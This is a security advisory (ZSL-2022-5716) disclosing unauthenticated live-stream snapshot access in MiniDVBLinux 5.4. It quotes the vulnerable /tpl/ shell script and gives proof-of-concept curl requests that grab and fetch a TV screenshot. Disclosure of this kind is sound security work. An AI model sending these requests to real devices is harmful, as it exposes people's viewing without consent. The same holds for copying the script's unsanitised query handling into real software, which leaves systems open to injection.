MiniDVBLinux 5.4 Unauthenticated Stream Disclosure

Credit: LiquidWorm
Risk: Medium
Local: No
Remote: Yes

MiniDVBLinux 5.4 Unauthenticated Stream Disclosure Vulnerability Vendor: MiniDVBLinux Product web page: Affected version: <=5.4 Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple way to convert a standard PC into a Multi Media Centre based on the Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this Linux based Digital Video Recorder: Watch TV, Timer controlled recordings, Time Shift, DVD and MP3 Replay, Setup and configuration via browser, and a lot more. MLD strives to be as small as possible, modular, simple. It supports numerous hardware platforms, like classic desktops in 32/64bit and also various low power ARM systems. Desc: The application suffers from an unauthenticated live stream disclosure when /tpl/ is called and generates a snapshot in /var/www/images/tv.jpg through the Simple VDR Protocol (SVDRP). -------------------------------------------------------------------- /var/www/tpl/ -------------------------- 01: #!/bin/sh 02: 03: header 04: 05: quality=60 06: "GRAB /tmp/tv.jpg $quality $(echo "$query" | sed "s/width=\(.*\)&height=\(.*\)/\1 \2/g")" 07: mv -f /tmp/tv.jpg /var/www/images 2>/dev/null -------------------------------------------------------------------- Tested on: MiniDVBLinux 5.4 BusyBox v1.25.1 Architecture: armhf, armhf-rpi2 GNU/Linux (armv7l) VideoDiskRecorder 2.4.6 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5716 Advisory URL: 24.09.2022 -- 1. Generate screengrab: - Request: curl http://ip:8008/tpl/ -H "Accept: */*" - Response: 220 mld SVDRP VideoDiskRecorder 2.4.6; Mon Sep 12 00:44:10 2022; UTF-8 250 Grabbed image /tmp/tv.jpg 60 221 mld closing connection 2. View screengrab: - Request: curl http://ip:8008/images/tv.jpg 3. Or use a browser: - http://ip:8008/home?site=remotecontrol

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022,


Back to Top